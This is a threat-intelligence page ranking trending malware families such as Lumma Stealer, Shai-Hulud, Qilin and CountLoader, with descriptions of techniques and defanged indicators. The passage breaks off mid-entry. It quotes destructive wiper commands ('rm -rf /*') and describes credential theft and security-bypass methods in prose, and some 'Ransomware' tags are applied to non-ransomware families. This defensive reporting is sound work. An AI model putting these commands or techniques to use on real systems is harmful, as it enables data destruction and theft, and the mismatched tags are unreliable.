Mallory

Trending Malware

The malware families the security industry is tracking right now. Ranked by mention velocity across vendor reports, researcher analysis, and threat feeds — refreshed continuously.

Ranked by Mallory's mention-velocity model across sources.

Mention map — Last week (tiles sized by mentions, colored by mention volume from highest to lowest)

Top 24 malware — Last week

#1 Lumma Stealer
Ransomware

Lumma Stealer is an information-stealing malware family, also referred to as Lumma, LummaC2, and LummaStealer. The provided content identifies it as a commodity infostealer used to harvest browser credentials, session cookies, and cryptocurrency wallet data. It has also been noted as capable of stealing browser passwords and cookies, and reporting on related malware lineage indicates strong focus on browser and wallet theft. The malware appears in multiple delivery ecosystems. Microsoft-linked reporting states that Fox Tempest’s malware-signing-as-a-service operation was used to sign and distribute Lumma Stealer, alongside Oyster, Vidar, and Rhysida, helping malicious binaries appear legitimate and bypass security controls. Fox Tempest was linked to threat actors and ransomware affiliates including Vanilla Tempest, Storm-0501, Storm-2561, and Storm-0249, with downstream victim sectors including healthcare, education, government, and financial services across multiple countries. The content also states that Vanilla Tempest used Fox Tempest-signed malware in campaigns involving fake software delivery. Bitdefender reporting in the content links Lumma Stealer to MSHTA-based infection chains. One prominent cluster involved CountLoader, an HTA-based loader used to deliver Lumma Stealer and Amatera. Observed infection vectors included phishing, fake or cracked software downloads, SEO poisoning, fake social media posts, direct messages, and ClickFix-style fake CAPTCHA or verification prompts. In one chain, victims executed a disguised Setup.exe containing a Python interpreter and a renamed MSHTA binary, which fetched additional payloads from attacker-controlled domains including google-services[.]cc and memory-scanner[.]cc; later infrastructure included explorer[.]vg and ccleaner[.]gl. Another chain used Discord phishing and clipboard-based social engineering to launch mshta.exe and ultimately deliver Lumma Stealer fully in memory. 
The content attributes several defense-evasion and browser-theft capabilities to Lumma Stealer or closely related activity. It states that Lumma Stealer attempted to bypass Windows AMSI by removing the string "AmsiScanBuffer" from clr.dll in memory to prevent it from being called. It is also explicitly named among infostealers that continued harvesting Chrome cookie data and other secrets after Google introduced App-Bound Encryption (ABE). Separate reporting in the content on Remus describes Lumma as using shellcode injection into a live browser process to recover and decrypt Chromium master keys from memory, and characterizes Lumma as one of the most technically advanced stealers-as-a-service in recent history. The content also links Lumma Stealer to broader malware clustering and detection artifacts. Crowdsourced YARA labels in one related campaign included Lumma, and a NuGet supply-chain investigation found a unique RSA key in malicious packages that also appeared in VirusTotal files labeled as related to Lumma, Quantum, AgentRacoon, and ArrowRAT. High-confidence indicators directly associated in the content with Lumma delivery ecosystems include domains such as google-services[.]cc, memory-scanner[.]cc, explorer[.]vg, and ccleaner[.]gl in CountLoader/MSHTA chains, as well as the Fox Tempest signing infrastructure signspace[.]cloud used to sign and distribute Lumma Stealer.

Mentions: 14

#2 Shai-Hulud

Shai-Hulud is a self-replicating supply-chain malware worm targeting the open-source software ecosystem, especially npm and PyPI packages and developer/CI environments. First reported in September 2025 and heavily active through 2026, it is consistently linked in the provided reporting to TeamPCP. Its core purpose is credential theft and automated propagation: it steals secrets such as GitHub tokens, npm tokens, API keys, AWS credentials, Kubernetes service account tokens, HashiCorp Vault tokens, SSH keys, cloud credentials, cryptocurrency wallet data, and other sensitive material from infected machines, then uses compromised maintainer or workflow credentials to publish trojanized package updates and spread further. Across the reporting, Shai-Hulud is described as infecting developer workstations and CI/CD pipelines through poisoned packages and install-time hooks, including npm preinstall/postinstall execution, Python import-time triggers, and malicious IDE or coding-agent persistence. Observed tradecraft includes downloading and using the Bun runtime to execute payloads; harvesting secrets from local files, environment variables, GitHub CLI data, AWS metadata endpoints, Kubernetes tokens, and GitHub Actions runner memory; abusing GitHub Actions OIDC trusted publishing to obtain npm publish access; and using stolen GitHub tokens to create public repositories or commits as fallback exfiltration channels. Multiple reports also describe persistence via VS Code tasks, Claude Code configuration hooks, Python .pth hooks, systemd user services, macOS LaunchAgents, Windows Startup entries, and token-monitor components. The malware has been associated with large-scale compromises of npm and PyPI packages, including campaigns affecting TanStack packages and incidents discussed in connection with Grafana, SAP developer packages, OpenSearch-related artifacts, Mistral AI-related packages, and other open-source ecosystems. 
Reporting states that TeamPCP publicly released or leaked Shai-Hulud source code on GitHub in May 2026, after which copycat variants rapidly appeared in npm packages such as chalk-tempalte and other typosquatted packages. These clones retained the original model of stealing credentials and exfiltrating them to attacker-controlled infrastructure or GitHub repositories. High-confidence indicators and artifacts directly mentioned in the content include campaign infrastructure such as git-tanstack.com and the /router path, t.m-kosche[.]com:443, 87e0bbc636999b[.]lhr[.]life, edcf8b03c84634[.]lhr[.]life, 80[.]200[.]28[.]28:2222, seed1.getsession.org, seed2.getsession.org, seed3.getsession.org, and api.masscan.cloud; package/file artifacts such as setup.mjs, ai_init.js, DEADMAN_SWITCH.sh, router_init.js, opensearch_init.js, gh-token-monitor.sh, gh-token-monitor.service, com.user.gh-token-monitor.plist, and pgmonitor.py; and compromise markers including public repositories described as "A Mini Sha1-Hulud has Appeared" or "Shai-Hulud: Here We Go Again," the string "thebeautifulmarchoftime," and the extortion-style message "IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner." Several reports also note a Russian-locale exclusion/kill switch and encrypted exfiltration using gzip plus AES-256-GCM with RSA wrapping.

Mentions: 14

#3 mini Shai-Hulud

Mini Shai-Hulud is a self-propagating supply-chain worm and credential-stealing malware campaign attributed in the provided reporting to TeamPCP (also tracked as UNC6780 in some reporting). It targets developer workstations, CI/CD runners, and cloud-connected build environments by compromising legitimate npm and PyPI packages and abusing trusted release pipelines. Reported affected ecosystems and projects include TanStack, Mistral AI, UiPath, OpenSearch, Guardrails AI, durabletask, and packages in the @antv ecosystem. The malware has also been linked in reporting to compromises involving poisoned Visual Studio Code extensions on developer devices. Its core behavior is credential theft and automated propagation. The malware is described as stealing CI/CD credentials, GitHub and npm/PyPI publishing tokens, GitHub Actions OIDC tokens, cloud access keys, SSH keys, Kubernetes secrets, HashiCorp Vault secrets, password-manager data, local credential files, shell histories, environment variables, database connection strings, and developer/AI tooling configuration data. Multiple reports state it can enumerate packages accessible to a stolen maintainer token and republish trojanized versions under legitimate accounts, allowing one infected developer machine or CI runner to spread the worm to additional packages. In some waves it abused GitHub Actions cache poisoning, pull_request_target workflow abuse, and runtime extraction of OIDC tokens from runner memory to publish malicious packages with valid SLSA Build Level 3 or Sigstore provenance. Execution and payload delivery varied by wave. Reported package-side artifacts include obfuscated JavaScript such as router_init.js, preinstall hooks invoking Bun, and Python import-time droppers. In the durabletask compromise, malicious versions 1.4.1, 1.4.2, and 1.4.3 executed on import on Linux, downloading rope.pyz from check.git-service[.]com to /tmp/managed.pyz and launching it with python3. 
Reported infrastructure and exfiltration endpoints associated with Mini Shai-Hulud include check.git-service[.]com, t.m-kosche[.]com, git-tanstack[.]com, filev2.getsession[.]org, api.masscan[.]cloud, and 83.142.209[.]194. The rope.pyz payload hash reported in the content is 069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce. The malware is reported to establish persistence on infected systems and survive package removal. Observed persistence mechanisms include backdoors in .vscode/tasks.json and .claude/settings.json, Linux systemd services such as gh-token-monitor.service and pgsql-monitor.service, and macOS LaunchAgents. Reported auxiliary components include kitty-monitor and gh-token-monitor, with the latter checking stolen GitHub tokens at short intervals and in some reporting acting as a dead-man’s switch. Some variants also injected malicious GitHub Actions workflows into repositories to exfiltrate secrets. Exfiltration is described as multi-path and resilient. Stolen data was reported as being serialized, compressed, encrypted with AES-256-GCM, and wrapped with RSA-OAEP before transmission. Besides direct C2 upload, fallback exfiltration reportedly used stolen GitHub tokens to create public repositories under victim accounts, often with Russian folklore-themed names such as BABA-YAGA, KOSCHEI, FIREBIRD, VASSILISA, and RUSALKA, or repositories containing the marker "Shai-Hulud: Here We Go Again." Some reporting also describes a FIRESCALE dead-drop mechanism using GitHub commit search to discover alternate C2 endpoints. The malware is primarily described as Linux-focused in its Python second-stage components and includes anti-analysis or targeting logic. Reported checks include exiting on non-Linux systems, Russian locale settings, and low CPU-count environments. 
Several reports describe destructive behavior: a dead-man’s-switch routine that can execute "rm -rf ~/" if a stolen token is revoked, and a geofenced wiper branch that on some Israeli- or Iranian-profiled hosts has a 1-in-6 chance of executing "rm -rf /*" or otherwise deleting accessible files, sometimes after downloading and playing audio from attacker infrastructure. High-confidence indicators and artifacts directly mentioned in the content include malicious file names router_init.js, setup.mjs, rope.pyz, and /tmp/managed.pyz; persistence artifacts such as ~/.config/systemd/user/gh-token-monitor.service, pgsql-monitor.service, ~/Library/LaunchAgents/com.user.gh-token-monitor.plist, .vscode/tasks.json, and .claude/settings.json; and the ransom-style token description "IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner." The reporting consistently characterizes Mini Shai-Hulud as an active, expanding supply-chain malware family that should lead defenders to treat any system that installed affected package versions as fully compromised.

Mentions: 13

#4 Oyster
Ransomware

Oyster, most commonly referred to as OysterLoader and also known as Broomstick, CleanUp, and CleanUpLoader, is a C++ multi-stage loader/backdoor used to establish initial access, maintain persistence, communicate with command-and-control infrastructure, collect host information, and deliver additional payloads. Reporting in the provided content links it primarily to campaigns associated with the Rhysida ransomware group, including activity by Vanilla Tempest, and also to delivery of commodity malware such as Vidar. It has been observed in malvertising, SEO-poisoning, and fake software download campaigns that impersonate legitimate software such as Microsoft Teams, PuTTY, WinSCP, Zoom, Google Authenticator, AnyDesk, Cisco Webex, and AI software. Delivery methods described include signed MSI installers, deceptive downloaders such as MSTeamsSetup_c_l_.exe, trojanized Microsoft Teams installers, compromised websites, fake ads, and DLL sideloading via a signed CapCut executable. The malware is described as a modular, multistage implant/loader with four stages in several reports: a TextShell packer/obfuscator, custom shellcode using a bespoke or modified LZMA decompression routine, an intermediate downloader that performs environment checks and initiates C2, and a final core DLL payload. Anti-analysis and evasion features directly mentioned include API hammering or flooding, anti-debugging via IsDebuggerPresent, dynamic API resolution using custom hashing, custom or modified LZMA routines, obfuscated embedded C2 domains, spoofed headers and deceptive user-agent strings, steganographic payload delivery in icon or PNG content, RC4 decryption of hidden payloads, and custom Base64-like encoding with non-standard alphabets and per-message shifts. Persistence mechanisms mentioned include scheduled tasks such as ClearMngs or tasks running every 13 minutes, dropped DLLs including COPYING3.dll and CleanUp30.dll, and execution via rundll32.exe. 
Host reconnaissance described in the content includes collection of computer name, username, domain, OS version, local IP address, privilege level, DLL version, and running process information. C2 behavior in the content includes earlier use of endpoints such as /reg and /login, /api/connect and /api/session, and later evolution to /api/v2/init, /api/v2/facade, and dynamically assigned beacon paths. Reported user-agent strings include WordPressAgent and FingerPrint. High-confidence infrastructure and artifacts directly mentioned include domains supfoundrysettlers[.]us, whereverhomebe[.]com, retdirectyourman[.]eu, grandideapay[.]com, nucleusgate[.]com, cardlowestgroup[.]com, socialcloudguru[.]com, coretether[.]com, and registrywave[.]com; IPs 85.239.53[.]66, 51.222.96[.]108, and 135.125.241[.]45; mutexes h6p#dx!&fse?%AS! and ITrkfSaV-4c7KwdfnC-Ds165XU4C-lH6R9pk1; filenames MSTeamsSetup_c_l_.exe, CleanUp30.dll, and COPYING3.dll; and the scheduled task name ClearMngs. The content also ties Oyster/OysterLoader to abuse of fraudulent Microsoft Artifact Signing/Trusted Signing certificates through the Fox Tempest malware-signing-as-a-service operation, which helped signed Oyster samples appear legitimate and bypass security controls. Downstream attacks linked to this ecosystem targeted healthcare, education, government, and financial services organizations globally.

Mentions: 10

#5 Vidar
Ransomware

Vidar is an information-stealing malware family, also referred to as Vidar Stealer or Vidar infostealer, active since late 2018 and described as a descendant or fork of Arkei. It targets Windows systems and is used to steal browser-stored credentials, cookies, autofill data, session tokens, cryptocurrency wallet data, system information, screenshots, email client data, local files, and, in newer reporting, Azure tokens, FTP/SSH credentials, and Telegram and Discord artifacts. Multiple reports describe Vidar using dead-drop resolver techniques via public services such as Telegram and Steam profiles to retrieve command-and-control information dynamically, and some samples communicate over HTTPS using multipart POST requests containing host identifiers. Reported anti-analysis and evasion features include debugger and sandbox checks, antivirus/security process checks, dynamic API resolution, process injection, browser decryption via CryptUnprotectData and BCrypt, and in some campaigns memory-resident or fileless execution. Observed delivery vectors in the provided content include spear-phishing emails with ZIP attachments containing malicious shortcut files, ClickFix social engineering that tricks users into running PowerShell commands from fake CAPTCHA or browser verification prompts, fake software installers, fake OpenClaw installers, trojanized MicrosoftToolkit software, fake GitHub repositories, Reddit and Discord lures, compromised WordPress sites, YouTube social engineering, trojanized npm packages, and fake game-cheat downloads including Counter-Strike 2 cheat lures. One campaign hid payload data in JPEG and TXT files using steganography; another used native Windows tools such as curl.exe, WScript, and PowerShell, Python Embed packages, scheduled tasks, and AutoIt loaders. 
Reporting also describes Vidar 2.0 as a major evolution with a rewrite from C++ to C, polymorphic builds, multithreading, broader data theft, and continued use of Telegram and Steam dead-drop resolvers. The malware is associated in the content with broad cybercriminal use and malware-as-a-service activity, and has been linked to campaigns or ecosystems involving Vanilla Tempest, Scattered Spider, and the Fox Tempest malware-signing-as-a-service operation. Microsoft reporting cited Vidar among malware families signed and distributed through Fox Tempest’s abuse of Microsoft Artifact Signing, alongside Oyster, Lumma Stealer, and Rhysida ransomware, affecting sectors including healthcare, education, government, and financial services globally. The content also states Vidar rose to prominence in the infostealer market after disruptions to Lumma and Rhadamanthys. High-confidence indicators mentioned in the content include Telegram dead-drop URLs such as telegram[.]me/hgo9tx, telegram[.]me/bul33bt, telegram[.]me/cego54, telegram[.]me/ahnadar, and t.me/b8bz11; Steam profile dead-drops including steamcommunity[.]com/profiles/76561198707628078, 76561198765046918, 76561198761022496, and 76561198780411257; active or related infrastructure including 135.181.237.59:443, gz[.]technicalprorj[.]xyz, kmot.co[.]kr, haeundaejugong[.]com, printory[.]kr, udcontest[.]com, ableinfo.co[.]kr, 114.207.246[.]156, and 149.154.167.99; and sample hashes including SHA256 2995ffb73342453b258926ec865c724e3567eee1bb8eb35d61796ee0c4f25105, fc27479ff929d846e7c5c5d147479c81e483a2ec911bd1501a53aa646a29620d, and 881619a47b62b52305d92640cc4d4845a279c23a5a749413785fc8fcb0fdf7fb.

Mentions: 10

#6 Rhysida
Ransomware

Rhysida is a ransomware family and associated ransomware-as-a-service operation first identified in May 2023. The malware is described as capable of both encrypting files and stealing data, enabling double-extortion attacks in which victims are pressured to pay for a decryption key and to prevent publication of stolen data. Reporting in the provided content links Rhysida activity to multiple actors, including Vanilla Tempest, and notes that Vice Society has delivered Rhysida in some attacks. Microsoft observed Fox Tempest, a malware-signing-as-a-service operation, enabling deployment of Rhysida by actors such as Vanilla Tempest through fraudulently obtained Microsoft-issued code-signing certificates. Rhysida has been associated with opportunistic intrusion methods and with campaigns targeting healthcare, education, government, and manufacturing; governments and other critical organizations worldwide are also referenced. The content cites high-profile incidents including attacks affecting the British Library, Seattle-Tacoma International Airport, and a claimed 2025 breach of Heart South Cardiovascular Group. Related delivery infrastructure includes Oyster/OysterLoader, also known as Broomstick or CleanUp, a multi-stage C++ loader used in campaigns linked to Rhysida that has been distributed via malvertising, SEO poisoning, and trojanized installers impersonating software such as Microsoft Teams, PuTTY, WinSCP, Google Authenticator, and Google Chrome. In observed chains, fake Teams installers signed through Fox Tempest deployed Oyster and in some cases Rhysida. Detection-oriented content also associates Rhysida with behaviors such as wallpaper changes, setting the ActiveDesktop NoChangingWallPaper registry value to enforce a malicious wallpaper, disabling logs with wevtutil, high process termination frequency, ransom note creation, PowerShell-based discovery and defense evasion, ACL tampering, service stopping, and process killing. 
High-confidence indicators directly mentioned in the content are primarily tied to Rhysida-linked delivery activity via OysterLoader, including domains such as grandideapay[.]com, nucleusgate[.]com, cardlowestgroup[.]com, socialcloudguru[.]com, coretether[.]com, registrywave[.]com, and the Fox Tempest signing platform signspace[.]cloud.

Mentions: 7

#7 rope.pyz

rope.pyz is a Linux-focused Python zipapp malware payload and modular cloud intrusion framework delivered in the malicious PyPI durabletask releases 1.4.1, 1.4.2, and 1.4.3. It is described as a direct evolution of transformers.pyz from the earlier guardrails-ai compromise and is linked in the reporting to TeamPCP’s broader Mini Shai-Hulud software supply-chain campaign. The durabletask package executed malicious code on import, downloading rope.pyz from attacker-controlled infrastructure including check.git-service[.]com/rope.pyz and launching it as /tmp/managed.pyz; reporting also identifies t.m-kosche[.]com as secondary infrastructure and 83.142.209.194 as a legacy campaign IP. The payload is reported as a Python zipapp containing 17 source files or 19 modules/files, with SHA-256 069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce. High-confidence reported capabilities include credential and secret theft from AWS, Azure, GCP, Kubernetes, HashiCorp Vault, local filesystems, shell history, environment variables, Docker environments, and password managers including Bitwarden, 1Password, pass, gopass, and GPG-based stores. It enumerates AWS Secrets Manager and SSM Parameter Store data, Azure subscriptions and Key Vault secrets, GCP Secret Manager data, Kubernetes secrets across namespaces and contexts, and Vault KV secrets. It also targets numerous local credential and configuration paths and shell history files such as .bash_history and .zsh_history. rope.pyz includes anti-analysis and targeting logic that exits on non-Linux systems, Russian locale settings, and low-CPU environments. It can install the cryptography dependency at runtime if needed. Reported exfiltration uses encrypted packaging of stolen data with gzip, AES-256-GCM, and RSA-OAEP with a hardcoded RSA-4096 public key, sending data primarily to https://check.git-service[.]com/api/public/version. 
Reporting also states it can use stolen GitHub tokens to create public repositories with Russian folklore-themed names for fallback exfiltration, and can use a FIRESCALE GitHub dead-drop mechanism for fallback command-and-control. Additional reported endpoints include /v1/models as a command or killswitch endpoint and /audio.mp3 in connection with destructive behavior. The malware supports lateral movement and propagation via AWS SSM and Kubernetes kubectl exec, with reporting stating it limits propagation to up to five targets per infected host or per mechanism. Infection and propagation markers include ~/.cache/.sys-update-check and ~/.cache/.sys-update-check-k8s, and downloaded runtime artifacts include /tmp/managed.pyz and /tmp/rope-*.pyz. Persistence has been reported via a fake systemd service named pgsql-monitor.service. Some reporting states rope.pyz contains a geographically targeted destructive component associated with Israel- and Iran-related locale or timezone indicators that may play audio from the C2 and execute rm -rf /* probabilistically. Targeted environments described in the reporting include Linux cloud workloads, CI/CD runners, Kubernetes environments, developer infrastructure, and official Microsoft durabletask users exposed through the poisoned PyPI releases.

Mentions: 6

#8 GraphWorm

GraphWorm is a backdoor used by the China-aligned APT group Webworm, also tracked as Space Pirates and UAT-8302. It was reported by ESET as part of Webworm’s 2025 tooling expansion and is used in campaigns targeting government organizations in Europe, including Belgium, Italy, Poland, Serbia, and Spain, as well as activity involving a university in South Africa. GraphWorm uses the Microsoft Graph API and Microsoft OneDrive for command-and-control, retrieving tasks and uploading victim information through cloud endpoints to blend with legitimate traffic. High-confidence reported capabilities include persistence via execution at user logon through Windows Registry Run key modification; generation of a unique victim ID derived from the network adapter IP, processor ID, and a physical device serial number obtained via WMI; creation of a dedicated OneDrive folder per victim with subfolders such as /files, /result, and /job for staging, tasking, and results; file upload and download; spawning cmd.exe or executing newly created processes; configurable sleep intervals; and stopping its own execution on operator signal. Reported implementation details include encryption of data with AES-256-CBC and base64 encoding, and use of the Microsoft Graph API /createUploadSession endpoint to upload large staged files to OneDrive. One report also states GraphWorm is written in Go and is internally referred to as OverOneDrive. The initial access and delivery mechanisms for GraphWorm are currently unknown based on the provided content.

Mentions: 4

#9 CountLoader
Ransomware

CountLoader is a multi-stage malware loader and malware-as-a-service platform active in the wild since at least June 2025. It is repeatedly described as an HTA/MSHTA-based loader used to deliver follow-on payloads including LummaStealer, Amatera, ACR Stealer, Cobalt Strike, AdaptixC2, PureHVNC RAT, PureMiner, and in some reporting ransomware-enablement tooling. Multiple reports link it to Russian-speaking cybercrime activity and ransomware ecosystems associated with LockBit, BlackBasta, and Qilin; Silent Push assesses it is likely used by initial access brokers or ransomware affiliates. Breakglass Intelligence assesses it as a Russian-speaking cybercrime or MaaS operation with strong infrastructure management, and one report notes Russian-language artifacts in the USB-spreading code. Observed infection vectors include phishing, fake software downloads, cracked software sites, SEO poisoning, fake social media posts, direct messages, CHM-triggered remote HTA execution, and HTML Application files disguised with benign extensions such as .wav, .xml, .mp4, .ini, .csv, and .rar. In one Bitdefender-observed chain, victims downloaded archives posing as setup utilities; the embedded Setup.exe was actually a legitimate Python interpreter bundled with malicious scripts and a renamed MSHTA binary (iso2022.exe) used to retrieve the next stage from attacker-controlled domains. Fortinet also documented a Ukrainian police-themed phishing campaign in which a malicious SVG led to a password-protected archive containing a CHM file that launched a remote HTA CountLoader stage. Core behavior across reporting shows CountLoader using mshta.exe to execute HTA content, layered obfuscation, anti-sandbox checks, host profiling, persistence, and flexible tasking. 
Anti-analysis checks include terminating or altering behavior for hostnames such as AZURE-PC, username Bruno, and certain SYSTEM/СИСТЕМА locale values; some samples also check for CrowdStrike Falcon and change execution flow to evade direct mshta.exe child-process detections. Persistence mechanisms include scheduled tasks running every 30 minutes for long durations, HKCU Run keys, and HTA relaunch. Reported scheduled task names include CCleanerTaskID, NVIDIA App SelfUpdate_{MD5_hash}, and Google-mimicking tasks. CountLoader supports multiple download and execution methods using PowerShell, curl.exe, bitsadmin, certutil, msiexec, and VBScript/XMLHTTP, and can execute EXEs, DLLs via rundll32, MSI packages, ZIP/Python chains, arbitrary HTA, and PowerShell payloads. A distinguishing capability is extensive cryptocurrency targeting. Breakglass and McAfee reporting state that CountLoader targets more than 50, and later 76, cryptocurrency wallet browser extensions across more than 40 browsers, plus desktop wallet applications including Ledger Live, Trezor, Exodus, Atomic Wallet, Guarda, KeepKey, and BitBox02. It also targets data from 66 Chromium-based browsers. McAfee documented a CountLoader campaign delivering a cryptocurrency clipper that intercepts clipboard wallet addresses and replaces them with attacker-controlled addresses. The same campaign used shellcode injection, AMSI bypass, in-memory execution under systeminfo.exe, and EtherHiding to retrieve final C2 information from the Ethereum blockchain. Another notable capability is enterprise reconnaissance. Breakglass Intelligence documented a dedicated Active Directory reconnaissance module that collects local system information, domain role, current user SID, group memberships, domain controller connectivity, Domain Admin membership, domain identifiers, all domain computers, and all domain groups using WMI and ADSI queries. 
This combination of wallet theft and AD reconnaissance means a single infection on a domain-joined host can support both immediate financial theft and later lateral movement or broader compromise. CountLoader also supports USB propagation. Multiple reports state it spreads through removable media by hiding original files and replacing them with malicious .lnk shortcuts that execute the malware, often while opening the original file to reduce suspicion. McAfee attributed roughly 9,000 infections in one campaign to the USB-spread mechanism. Infrastructure associated with CountLoader includes domains masquerading as legitimate services and software brands. High-confidence examples directly mentioned in the content include google-services[.]cc, memory-scanner[.]cc, explorer[.]vg, ccleaner[.]gl, microservice[.]gl, web3-walletnotify[.]cc, communicationfirewall-security[.]cc, burning-edge[.]sbs, favourite-guide[.]cc, indeanapolice[.]cc, s1-rarlab[.]com, magnusworkspace[.]com, s3-python[.]cc, node1-py-store[.]com, and node2-py-store[.]com. Reported IPs include 192.109.200.130, 82.29.72.214, 65.21.174.205, 45.43.137.82, 194.102.104.221, 178.255.222.234, and 85.121.148.80. Specific sample hashes directly tied to CountLoader in the content include 4ee17ce2e1ce0ede59dceabbba28265923ce4e25ddb002617e3cc8f13cfff6a3 for a trojanized CCleaner installer, 5f9ff671955a6d551595f9838aed063c496da5039be0d222fe84f96cb3e1d32a for a Stage 1 EXE in McAfee’s campaign, e27ff6646a2f98b81ea5da4d0d93127f0f3e68a5e6728f404724e388376ede84 for Summer_Data_Primary_44.rar, and the recurring CLSID {0830A3F8-70B8-40E1-A0F3-E0EC9092F861}. Breakglass also extracted CountLoader version string v4.1.1 and documented custom XOR-plus-base64 C2 communications with JWT-authenticated bot management.

Mentions: 4

#10 Qilin
Ransomware

Qilin, also known as Agenda and AgendaCrypt, is a Russian-speaking ransomware-as-a-service (RaaS) operation first observed in July 2022 under the name Agenda and rebranded as Qilin in September 2022. It operates a double-extortion model with file encryption and data theft, uses a Tor negotiation portal and leak blog, and reportedly excludes CIS countries from targeting while paying affiliates 80% to 85% of collected ransoms. The operation became one of the most prominent ransomware brands in 2025-2026, with reporting stating it was the most prolific ransomware brand by data leak site volume in 2025 and the leading operation for the third consecutive quarter in Q1 2026 with 338 posted victims. After RansomHub went quiet, reporting indicates Akira and Qilin absorbed part of its market share. The malware supports cross-platform targeting. Content describes Windows and Linux/ESXi-focused capabilities, including use against virtualization infrastructure and backup or identity systems as part of recovery-denial tactics. A recovered Rust-based Qilin sample was described as a statically linked x86 PE32 executable compiled on 2026-03-17. Its encryption uses either AES-256 or ChaCha20 selected per file, with intermittent encryption based on file size. Encrypted files receive a 550-byte footer containing a 512-byte RSA-OAEP-wrapped symmetric key, an 8-byte length field, and the ASCII marker "-----END CIPHERTEXT BLOCK-----". The sample embedded additional tooling in .rdata, including a VMware vCenter PowerShell spreader that installs PowerCLI, connects to vCenter, enumerates ESXi hosts, uploads the Linux Qilin encryptor, and launches it on each host, as well as signed Sysinternals PsExec binaries and wallpaper images. Qilin has notable defense-evasion and security-tool disabling functionality. Reporting states it can terminate antivirus-related processes and services. 
It has been observed using a three-driver EDR-killing chain involving signed vulnerable drivers RwDrv.sys and ControlCenter.sys plus a custom unsigned driver hlpdrv.sys that strips file ACLs and terminates processes by PID. Separate reporting states Qilin operators added the vulnerable signed Windows kernel driver TPwSav.sys to their toolkit for BYOVD attacks. Qilin can also abuse legitimate remote management software: specifically, it can use Splashtop's SRManager.exe to execute the Linux ransomware binary directly on Windows systems. The operation is associated with multiple threat actors and affiliate ecosystems. Microsoft reporting tied Fox Tempest-linked ransomware affiliates to Qilin, and Microsoft stated Octo Tempest, also known as Scattered Spider, was a Qilin affiliate. Other reporting states The Gentlemen's founder was a former Qilin affiliate. Rapid7 reporting linked MuddyWater and Iran's MOIS to the Qilin ecosystem, including use of Qilin in attacks against Israeli organizations. Victimology in the provided content includes critical infrastructure and healthcare. Qilin is explicitly described as targeting critical infrastructure sectors and healthcare organizations, including hospitals and clinical service providers, using both data exfiltration and encryption. High-profile incidents in the content include the June 2024 attack on Synnovis, an NHS vendor, which disrupted NHS blood testing and was reported to have caused cancellation of roughly 1,100 surgeries and 2,000 outpatient appointments. Additional reporting states long-term disruption persisted into 2026 at South London and Maudsley NHS Foundation Trust, with pathology systems not fully restored, 161,560 pathology reports delayed in entry to patient records, and prior reporting referenced more than 10,000 impacted appointments, leaked sensitive medical data, and 170 harmed patients. 
The content also references Qilin claims involving Rocky Mountain Care, Asahi Group Holdings, Nissan Creative Box, Lee Enterprises, and Malaysia Airports, with one report stating Qilin demanded $10 million from Malaysia Airports and claimed to hold 2 TB of its data. Notable indicators and artifacts directly mentioned in the content include aliases Agenda and AgendaCrypt; the clearweb leak domain wikileaks2.site referenced in a ransom note; an alternate leak URL using https://31.41.244.100 in a separate DLL campaign; company IDs QEz6CWqBK1 and 0c-IyC4m1G in analyzed samples; the ASCII footer marker "-----END CIPHERTEXT BLOCK-----"; and drivers RwDrv.sys, ControlCenter.sys, hlpdrv.sys, and TPwSav.sys. The content also notes one analyzed EXE sample accepted any non-empty password at runtime because a SHA-256 password comparison was bypassed by an unconditional jump.

Mentions: 4
#11 fast16

Fast16 is a cyber sabotage framework and malware platform whose known core components date to approximately 2005, predating the public discovery of Stuxnet by about five years. Public reporting describes it as a Lua-based, modular Windows malware framework centered on the carrier svcmgmt.exe and the boot-start filesystem driver fast16.sys. The service binary embeds an early Lua 5.0 virtual machine and encrypted Lua payloads, while the driver intercepts filesystem reads and patches executable code in memory using a rule-driven hook engine with 101 byte-pattern rules. The malware was designed to tamper with high-precision engineering and physics simulation software rather than conduct conventional espionage. High-confidence reporting identifies LS-DYNA and AUTODYN as targeted applications, and other analyses indicate likely overlap with LS-DYNA 970, PKPM, and the MOHID hydrodynamic modeling platform. Its sabotage logic selectively alters floating-point and simulation outputs under narrow conditions, including high-explosive and detonation modeling scenarios. Multiple reports state that it was intended to corrupt simulation results in a subtle, predictable, and reproducible way, including by reducing pressure- or stress-related values once simulated material density reached about 30 g/cm³. Researchers assessed this behavior as consistent with interference in nuclear weapons-related implosion simulations and high-explosive detonation modeling. Fast16 also includes worm-like lateral movement. Reporting states that svcmgmt.exe can deploy wormlets that propagate across Windows 2000 and Windows XP systems via Windows service-control and file-sharing APIs, copying itself to remote administrative shares and creating remote services. The malware checks for the presence of certain security products in the registry and may refuse to spread or install when those products are detected. 
Additional reported behaviors include boot-time persistence through the kernel driver, targeting of Intel-compiled executables, and modification of code as files are read from disk rather than simply replacing binaries on disk. Researchers from SentinelOne publicly disclosed and analyzed Fast16 in April 2026, and later analysis by Symantec and Carbon Black concluded that it was explicitly designed to tamper with LS-DYNA and AUTODYN simulations involving high explosives, with evidence strongly suggesting a focus on nuclear detonation modeling. The content links the name fast16 to material leaked by the Shadow Brokers in 2017, but attribution remains unconfirmed in the reporting. High-confidence indicators directly mentioned in the content include the filenames svcmgmt.exe and fast16.sys; reported hashes include svcmgmt.exe SHA256 9a10e1faa86a5d39417cae44da5adf38824dfb9a16432e34df766aa1dc9e3525 and fast16.sys SHA256 07c69fc33271cf5a2ce03ac1fed7a3b16357aec093c5bf9ef61fbfa4348d0529.

Mentions: 4
#12 Reaper

Reaper is a macOS infostealer tracked as a variant of the SHub malware family. SentinelOne reported that it impersonates trusted brands including Apple, Microsoft, and Google during infection and persistence stages. The campaign uses fake WeChat and Miro installer pages hosted on typo-squatted infrastructure including mlcrosoft[.]co[.]com, with hidden JavaScript used to profile victims. Multiple reports state the malware avoids infecting likely Russia/CIS-region systems by checking locale or input-source indicators and exiting if matched. Execution is delivered through macOS Script Editor via the applescript:// URL scheme, with a malicious AppleScript pre-populated and visually hidden using padding, ASCII art, or fake installer text. This approach was reported as a departure from earlier SHub ClickFix-style delivery and as a way to bypass Apple Tahoe 26.4 mitigations aimed at Terminal-based flows. After the user runs the script, Reaper retrieves additional AppleScript or shell content, may display a fake XProtectRemediator or security-update prompt, and prompts for the user’s macOS login password to facilitate credential theft and decryption of stored data. Reaper steals browser data and credentials, password manager data, cryptocurrency wallet data, developer-related files, macOS Keychain data, iCloud account information, Telegram session data, and documents from Desktop and Documents. Reported targets include browser extensions and 